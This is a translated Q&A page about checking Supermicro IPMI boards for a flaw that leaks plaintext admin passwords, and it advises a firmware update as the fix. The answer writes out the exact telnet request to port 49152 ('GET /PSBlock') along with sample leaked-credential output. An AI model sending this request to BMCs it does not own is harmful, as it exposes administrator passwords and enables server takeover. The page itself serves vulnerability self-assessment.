Vin*_*rão 10 password ipmi exploit supermicro
我有一些运行 IPMI 的 Supermicro 服务器,如本博客中所述(http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some- added-extras)有一个严重的漏洞从任何远程位置获取明文管理员密码。
如何检查我的服务器主板是否已损坏?
Vin*_*rão 13
只需 telnet 到端口 49152 中的 IPMI IP 地址并执行特定的 GET 请求。如果您遭到入侵,您应该获取您的用户和密码。
telnet server.example.com 49152
Run Code Online (Sandbox Code Playgroud)
连接请求GET /PSBlock
并查看结果后,应该是这样的:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Run Code Online (Sandbox Code Playgroud)
回答:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Run Code Online (Sandbox Code Playgroud)
要解决此问题,请将 IPMI 固件更新到最新版本。固件特定于您的 IPMI 控制器,因此您应该在 Supermicro 网站上获取指定的固件。
然后在更新固件后更改您的密码。
归档时间: |
|
查看次数: |
12517 次 |
最近记录: |